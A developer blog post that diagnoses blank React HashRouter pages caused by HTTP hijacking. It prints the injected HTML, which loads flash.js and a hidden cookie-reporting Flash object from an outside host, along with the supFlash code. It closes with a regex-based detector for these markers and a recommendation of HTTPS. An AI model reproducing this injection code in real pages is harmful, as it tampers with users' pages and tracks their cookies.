This is the 8th day of my participation in Gwen Challenge

Problem analysis

Some time ago, the company launched a React development project. Testing colleagues found that the page would occasionally appear blank when refreshed multiple times.

The figure above compares the normal case with the abnormal case. In the abnormal case, the page load goes through the following requests:

  1. v2.html
  2. flash.js
  3. v2.html

In the abnormal case, the first v2.html request is hijacked and returns the following data:

<html>
  <head>
    <script language="javascript">
      setTimeout('location.replace(location.href.split("#")[0])', 2000)
    </script>
    <script
      type="text/javascript"
      src="http://xxxx:89/cookie/flash.js"
    ></script>
    <script language="javascript">
      // 
      setURL('xxxx')
      supFlash('xxxx')
    </script>
  </head>
  <body>
    <object
      classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
      codebase="Http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7, 0, 0,"
      width="0"
      height="0"
      id="m"
      align="center"
      ><param name="allowScriptAccess" value="always" />
      <param name="movie" value="http://xxxx:89/cookie/flashcookie.swf" />
      <param name="quality" value="high" />
      <param name="FlashVars" value="srv=xxxx" />
      <embed
        src="http://xxxx:89/cookie/flashcookie.swf"
        FlashVars="srv=xxxx"
        quality="high"
        width="0"
        height="0"
        name="m"
        align="center"
        allowScriptAccess="always"
        type="application/x-shockwave-flash"
        pluginspage="http://www.macromedia.com/go/getflashplayer"
      />
    </object>
  </body>
</html>

The xxxx placeholders above mask sensitive information.

The injected call setTimeout('location.replace(location.href.split("#")[0])', 2000) reloads the page after two seconds with the hash removed from the URL. In addition, cookie/flash.js defines the loadPage function, which also clears the hash from the URL.

function loadPage () {
  // Reload the page with everything after '#' dropped from the URL
  location.replace(location.href.split('#')[0])
}

This causes the HashRouter path of the React-Router route to be cleared.

cookie/flash.js


function supFlash (cookie) {
  if (false === IsCanReport2Ac()) {
    loadPage()
    return
  }

  // Get the local cookie value
  var td_cookie = getCookie('td_cookie')
  if (td_cookie == cookie) {
    loadPage()
    return
  }
  setCookie('td_cookie', cookie)

  var flash = 0
  var judgeIE = !-[1]
  var ua = navigator.userAgent.toLowerCase()
  if (ua.indexOf('taobrowser') > 0 || ua.indexOf('lbbrowser') > 0) {
    loadPage()
    return
  }
  var isIE = judgeIE || ua.indexOf('msie') > 0 || ua.indexOf('trident/7.0') > 0
  // Check whether a Flash plugin is available
  if (isIE) {
    try {
      var swf1 = new ActiveXObject('ShockwaveFlash.ShockwaveFlash')
      flash = 1
    } catch (e) {
      flash = 0
    }
  } else {
    try {
      var swf2 = navigator.plugins['Shockwave Flash']
      if (swf2 == undefined) {
        flash = 0
      } else {
        flash = 1
      }
    } catch (e) {
      flash = 0
    }
  }
  // No Flash available: just reload without the hash
  if (flash === 0) {
    loadPage()
    return
  }
}

cookie/flash.js calls the supFlash function above to report cookie information via Flash, but what it does with that information is unknown.

Unexpected HTTP hijacking not only affects page presentation, but also compromises the security of the service. So how do we solve this problem? Using HTTPS to encrypt the traffic and prevent man-in-the-middle attacks should be a good solution.
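
The check below is an added example, not code from the original post: it flags the injected page in a response body fetched over plain HTTP, using the markers visible in the hijacked response above, and shows what the injected reload does to a HashRouter URL. The sample bodies, the app.example URL and the id="root" mount point are assumptions.

```javascript
// Added example: markers come from the hijacked response shown in this post;
// the sample bodies, URLs and the id="root" mount point are constructed.
const MARKERS = [
  { name: 'hash-stripping reload',
    re: /location\.replace\(\s*location\.href\.split\(\s*["']#["']\s*\)\s*\[0\]\s*\)/ },
  { name: 'external cookie/flash.js',
    re: /<script[^>]+src=["']http:\/\/[^"']+\/cookie\/flash\.js["']/i },
  { name: 'flashcookie.swf embed', re: /\/cookie\/flashcookie\.swf/i },
  { name: 'supFlash() call', re: /\bsupFlash\s*\(/ },
];

// Names of the injection markers present in an HTML body.
function findInjectionMarkers(html) {
  return MARKERS.filter((m) => m.re.test(html)).map((m) => m.name);
}

// Hijacked = the app's mount point is missing AND at least two markers hit
// (a single marker alone could be a false positive).
function isHijacked(html, mountPoint = 'id="root"') {
  return !html.includes(mountPoint) && findInjectionMarkers(html).length >= 2;
}

// Effect of the injected reload on a HashRouter URL: the route is dropped.
function urlAfterInjectedReload(href) {
  return href.split('#')[0];
}

// Constructed sample: condensed form of the injected page.
const HIJACKED_SAMPLE = `<html><head>
<script language="javascript">
  setTimeout('location.replace(location.href.split("#")[0])', 2000)
</script>
<script type="text/javascript" src="http://xxxx:89/cookie/flash.js"></script>
<script language="javascript">setURL('xxxx'); supFlash('xxxx')</script>
</head><body><embed src="http://xxxx:89/cookie/flashcookie.swf" /></body></html>`;

// Constructed sample: what the real v2.html might look like.
const NORMAL_SAMPLE = `<html><head><script src="/static/js/main.js"></script>
</head><body><div id="root"></div></body></html>`;

console.log(findInjectionMarkers(HIJACKED_SAMPLE));
console.log(isHijacked(HIJACKED_SAMPLE), isHijacked(NORMAL_SAMPLE));
console.log(urlAfterInjectedReload('http://app.example/v2.html#/orders/42'));
```

Run from a vantage point on the affected network against the plain-HTTP URL; the same request over HTTPS should never match.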
